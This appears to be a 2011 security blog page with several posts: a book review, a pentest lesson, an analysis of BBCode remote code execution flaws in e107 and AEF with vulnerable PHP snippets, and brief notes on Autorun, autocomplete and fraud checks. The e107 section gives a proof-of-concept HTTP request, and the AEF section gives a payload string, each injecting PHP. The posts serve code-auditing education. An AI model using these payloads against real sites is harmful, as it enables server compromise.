Saturday, January 29, 2011

[Book-Review] The Myths of Security: What the Computer Security Industry Doesn't Want You to Know

This book written by John Viega is meant mainly for non-security IT professionals and technical savvy people. The author highlighted his thoughts on - why AV fails, why we might get 0wned though we make safe caution against threat, why https fails, why IDS sucks, why CaptCha sucks, why responsible disclosure isn't responsible, why application security hasn't been achieved or won't be achieved  for always.

With the price of used book at $7.36~, it's worth to learn ideas from someone who have been in IT Security for many years and have written several security books (Building security softwares, Secure Programming Cookboook, 19 deadly sins of software,...etc). 

Sunday, January 23, 2011

Common Enterprise Weakness: Only scan this and that server

Case Study:
https://www.trustwave.com/downloads/Trustwave-Case-Study-Internal-Penetration-Test.pdf


Analysis:
TrustWave team pointed out that via insecure network segment, they eventually compromised the highly critical network segment that processes payment card information.

Lesson Learnt:
Based on our experience, nowadays small and medium (sometimes, even big) enterprise hire pentest services only for their critical servers whilst they fail to secure all their work station on different network segment portions. Password issues (weak password, blank password of both OS and other servers of database/commercial applications) are always common in some organizations because of the laziness of system admins there even if there is a written policy and rule for setting strong passwords.
According to the case study, TrustWave team would find it harder to attack probably tightened payment card network if they targeted only that portion. We're sure that TrustWave would explain to and negotiate with their client that targeting only secure portion might not portray/represent its actual security state.

e107 Remote Code Execution via BBCode (aka Attacking Flaws in BBCode)

Vulnerability:
http://php-security.org/2010/05/19/mops-2010-035-e107-bbcode-remote-php-code-execution-vulnerability/index.html


Analysis:
Due to the sole reason of providing full capability and control over application, nowadays' web developers provide a feature that allows application admin users to run arbitrary PHP codes via applications. e107 CMS is not the only one. Drupal CMS also has this feature.


[CODE]
$text = preg_replace("#\[(php)#i", "[\\1", $text);
[/CODE]

PoC exploit is noted as:

--------------------------------------------------------------------------------------------
POST /contact.php HTTP/1.1
Host: xxxx
User-Agent: e107 0.7.20 Remote Code Execution Exploit
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

send-contactus=1&author_name=[php]phpinfo()%3bdie()%3b[/php]

--------------------------------------------------------------------------------------------

Similarly, AEF (Advanced Electron Forum)  had flawed bbCode implementation as shown by GulfTech Security Research.

[CODE]
//Email Links
if($globals['bbc_email']){

$text = preg_replace(
array("/\[email=(.*?)\](.*?)\[\/email\]/ies",
"/\[email\](.*?)\[\/email\]/ies"),
array('check_email("$1", "$2")',
'check_email("$1", "$1")'), $text);

}
[/CODE] 



PoC exploit is noted as:

[email]{${phpinfo()}}[/email]
 
 
 
Lessons Learnt:

Featuring arbitrary code execution capability for privileged users in application means if attackers can take control over an admin user account, it means they compromise the user account of that web application on the server. This aids them to launch further attacks on the server as a whole.  Manipulating strings that come from RegExp-based replacement is dangerous if these strings are placed into user definable functions, eval and the like.

In source code auditing project, it's necessary to suggest developers to disable/remove this feature. If this is a business/must-have requirement, list all such application features that pose as high risk and allow attackers to shell access upon compromise of admin user account. These features may include (but not limited to):

1. File and Directory Operations (File Upload/Delete/Create, Directory Delete/Browse)
2. Running executable programs fed by users' input.
3. Arbitrary Operating System Command Execution Feature for privileged users
4. Arbitrary Database Command Execution Feature for privileged users


Get authentication_checker function (i.e is_admin, is_user, is_anonymous). Examine this function to make sure that developers check it at each entry of such risky features.

Friday, January 21, 2011

Autorun

One of the reasons of malware spreading via readable/writable media in Windows platform is

  • Windows itself enables Autorun by default
  • Some applications even ask users to enable Autorun if disabled. 

Wednesday, January 19, 2011

Hacking Auto-Complete

Jeremiah's Research:
http://www.slideshare.net/jeremiahgrossman/breaking-browsers-hacking-autocomplete-blackhat-usa-2010


Established Recommendation:
Disable "autocomplete" or Set autocomplete="off" in input tag password field.
This is 99% ignored by majority of web developers today.


Myth:
Before Jeremiah's Research, it was widely believed that this autocomplete issue is ONLY a local privacy issue. Attackers who physically gain access to a victim's machine can gain access to his browser autocomplete values.


Lesson Learnt:
Research security-related recommendations that have been acted upon issues which are considered as low-risk or impossible-to-happen.

Work harder or think out of the box to create an amazingly PoC that transforms such low-risk to medium/high one.

Friday, January 7, 2011

Weak Fraud Check vulnerable to Brute Force


We've seen a fraud check is being used in some web applications such as billings, and email registration such as Gmail. Here, a traditional habit is still used by developers. This is verification by digits only.


secure configurations for Laravel - The PHP Framework

This framework is makes security simple to achieve.  Out of all non-default settings, the little following can be set to achieve higher secu...